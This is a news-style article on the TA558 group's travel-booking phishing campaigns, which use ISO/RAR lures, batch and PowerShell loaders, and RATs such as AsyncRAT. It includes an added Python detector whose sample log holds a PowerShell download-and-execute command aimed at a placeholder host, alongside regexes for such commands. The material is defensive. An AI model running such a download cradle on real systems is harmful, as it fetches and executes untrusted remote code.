Beware of Cybercriminals: The Rising Threat of Fake Travel Reservation Links

Bogus travel bookings are adding to the woes of the travel-fatigued, who are already grappling with the distress of flight cancellations and jam-packed hotels.

A well-known cyber threat group known as TA558 has intensified its activities, particularly focusing on the travel and hospitality sectors. Following a period of reduced activities, likely due to the travel limitations imposed by the COVID pandemic, the threat group has escalated its operations to take advantage of the increased travel and corresponding rise in airline and hotel reservations.

Security experts have cautioned that cybercriminal group TA558 has re-engineered their 2018 tactics, now using counterfeit booking emails containing links. These links, when clicked, release a harmful malware payload composed of a mix of different malware types.

The latest campaign stands out for its use of RAR and ISO file attachments in messages, as indicated by a Proofpoint report. Both are container formats: when opened, they expose the files and folders packed inside.

In 2022, TA558 started to employ URLs more often. The number of campaigns orchestrated by TA558 involving URLs in 2022 was 27, a significant jump from merely five campaigns in total from the period 2018 to 2021. Usually, these URLs would direct to container files like ISOs or zipped [RAR] files that held executables, as reported by Proofpoint.

For the infection to take place, the intended target must be deceived into unpacking the file archive. “The booking link… directed to an ISO file along with an integrated batch file. The running of the BAT file instigated a PowerShell aid script that fetched a subsequent payload, AsyncRAT,” the investigators reported.
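As an added illustration of how a defender might spot the ISO-to-BAT-to-PowerShell chain described above in process-creation telemetry (this is example code written for this page, not from the article or Proofpoint; the key=value log format, its field names, the drive-letter heuristic and the sample events are all constructed assumptions):

```python
import re

# Constructed sample process-creation events (not real telemetry). A mounted
# ISO appears on Windows as an extra drive letter whose root holds the lure,
# here a hypothetical "reserva.bat" on E:\. The URL is a placeholder.
SAMPLE_LOG = """\
pid=1201 ppid=900 image=C:\\Windows\\explorer.exe cmdline="explorer.exe"
pid=2410 ppid=1201 image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c E:\\reserva.bat"
pid=2432 ppid=2410 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
pid=3001 ppid=1201 image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c build.bat"
pid=3002 ppid=3001 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell.exe -File deploy.ps1"
"""

# key=value or key="value with spaces"
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

# Heuristic 1: a .bat launched from the root of a non-system drive, which is
# where a mounted ISO (or removable media) typically shows up.
BAT_FROM_IMAGE_RE = re.compile(r'\b[D-Z]:\\[^\\\s"]+\.bat\b', re.IGNORECASE)
# Heuristic 2: PowerShell fetching a follow-on payload or hiding its window.
PS_DOWNLOAD_RE = re.compile(
    r'downloadstring|downloadfile|invoke-webrequest|\biwr\b|-w(indowstyle)?\s+hidden',
    re.IGNORECASE)

def parse_event(line):
    """Parse one constructed key=value line into a dict with int pid/ppid."""
    ev = {}
    for m in FIELD_RE.finditer(line):
        ev[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    ev["pid"], ev["ppid"] = int(ev["pid"]), int(ev["ppid"])
    return ev

def find_iso_bat_powershell_chains(log_text):
    """Return (cmd_pid, powershell_pid) pairs matching the described chain:
    cmd.exe running a .bat from a non-system drive root, whose child is
    PowerShell with a download/hidden-window command line."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        if not PS_DOWNLOAD_RE.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not parent["image"].lower().endswith("cmd.exe"):
            continue
        if BAT_FROM_IMAGE_RE.search(parent["cmdline"]):
            hits.append((parent["pid"], e["pid"]))
    return hits

if __name__ == "__main__":
    print(find_iso_bat_powershell_chains(SAMPLE_LOG))
```

The benign build.bat/deploy.ps1 pair is deliberately included so the rule is seen to require both the drive-root batch file and the download pattern before it fires.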

From Booking Email to Malware Infection

Previous TA558 operations, monitored by Palo Alto Networks (in 2018), Cisco Talos (in 2020 and 2021) and Uptycs (in 2020), have used malicious Microsoft Word document attachments (CVE-2017-11882) or remote template URLs to download and install malware, as reported by Proofpoint.

The move towards ISO and RAR files is probably a response to Microsoft’s declarations at the end of 2021 and the beginning of 2022, about turning off macros [VBA and XL4] in Office tools as a default setting, according to experts.

The pace of campaigns saw a considerable rise in 2022. These campaigns introduced a cocktail of malicious software including Loda, Revenge RAT, and AsyncRAT. The perpetrator employed an array of dissemination methods such as URLs, RAR and ISO attachments, along with Office documents, as noted by the researchers.

The latest malware attacks often carry harmful payloads, such as remote access trojans (RATs), according to Proofpoint. These RATs can allow spying, data pilfering, and delivery of additional harmful payloads.

Regardless of their transformations, the group’s objective has consistently stayed the same. The researchers determined “with moderate to strong assurance” that TA558 is driven by financial gains, leveraging pilfered data to expand and embezzle funds. “Potential breaches could pose a risk to both travel companies and their customers who have utilized their services for holidaying,” stated Sherrod DeGrippo, the VP of threat investigation and identification at Proofpoint, in a commentary. “Entities in these and associated sectors should stay vigilant about this perpetrator’s actions and implement measures to safeguard themselves.”

The Story of TA558

TA558 has had its major focus on companies within the travel, hospitality, and associated sectors from 2018 onwards. These companies are usually based in Latin America, but occasionally they can also be found in North America or Western Europe.

Historically, TA558 has relied on cleverly crafted emails to entice unsuspecting individuals into opening harmful links or files. These emails, primarily composed in Portuguese or Spanish, typically presented information related to hotel bookings. The subject or the title of the attached file was frequently nothing more than “reserva.”

In their early campaigns, the group exploited weaknesses in Microsoft Word’s Equation Editor, such as CVE-2017-11882, a remote code execution flaw. Their main objective was to install a Remote Access Trojan, typically Loda or Revenge RAT, on the victim’s computer.

The group broadened its toolkit in 2019, employing malicious macros embedded in PowerPoint files and template injection in Office documents. It also started targeting a new audience, making use of English-language phishing lures for the first time.

TA558 saw its peak activity in early 2020, launching 25 malicious campaigns in the first month alone. Its modus operandi mainly involved Office documents loaded with macros, or exploitation of known Office vulnerabilities.

Organizations, particularly those operating in the targeted sectors in Latin America, North America, and Western Europe, should stay vigilant about this actor’s tactics, techniques, and procedures, as the researchers advise.
